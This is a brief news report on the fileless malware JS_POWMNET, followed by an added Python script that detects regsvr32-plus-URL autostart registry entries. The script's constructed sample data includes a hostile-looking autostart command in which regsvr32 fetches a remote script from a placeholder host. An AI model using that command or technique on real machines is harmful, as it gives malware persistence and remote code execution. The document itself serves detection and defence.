New virus doesn't save a file during infection

Anti-virus company Trend Micro detected new malware called JS_POWMNET that uses a fileless infection chain. A fileless infection chain never saves a file to the machine, which makes it harder to analyze in a sandbox. It is unclear whether users unknowingly download it or other malware drops it onto the infected machine. Regardless of how it gets in, an autostart registry entry receives a URL to fetch malicious JavaScript. This enables regsvr32 to execute arbitrary scripts without saving the XML file to the computer. The malicious script then downloads TROJ_PSINJECT, which runs a PowerShell script that downloads an encrypted file called "favicon." Finally, the favicon file is decrypted so it can load its payload. To protect against fileless malware, experts recommend that organizations segment their networks to limit access and disable PowerShell if they don't use it.
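
The persistence step described above leaves one artifact on disk-free systems that defenders can still check: an autostart registry value whose command line pairs regsvr32 with a URL. The Python below is an added example, not code from Trend Micro or the original article; it assumes the entry sits under the Run keys and is read from `reg query` text output, and the sample data is constructed.

```python
import re
import sys

# A value line in `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# regsvr32 as a command token, with or without a path or the .exe suffix.
REGSVR32_RE = re.compile(r"(?:^|[\\/\s\"'])regsvr32(?:\.exe)?(?=[\s\"']|$)", re.IGNORECASE)

# Constructed sample, shaped like `reg query` output for the Run keys (an assumption;
# the article only says "autostart registry entry").
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    regsvr32.exe /s http://host.example.invalid/a

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Vendor Help    REG_SZ    "C:\Program Files\Vendor\help.exe" --home https://vendor.example.invalid/
"""

def find_suspicious_autostarts(reg_query_output):
    """Return autostart values whose command runs regsvr32 and also carries a URL."""
    findings = []
    key = None
    for line in reg_query_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()          # remember which key the following values belong to
            continue
        m = VALUE_RE.match(line)
        if not m or not m["type"].endswith("SZ"):
            continue                    # skip blanks and non-string types (DWORD, BINARY)
        data = m["data"]
        urls = URL_RE.findall(data)
        # A URL alone is common in legitimate entries; regsvr32 plus a URL is not.
        if urls and REGSVR32_RE.search(data):
            findings.append({"key": key, "name": m["name"], "urls": urls, "data": data})
    return findings

if __name__ == "__main__":
    # Pipe real `reg query` output on stdin, or run with no input to use the sample.
    text = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for f in find_suspicious_autostarts(text):
        print(f"{f['key']}\\{f['name']}: {f['data']}")
```

On a Windows host, the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` can be piped into the script in place of the sample.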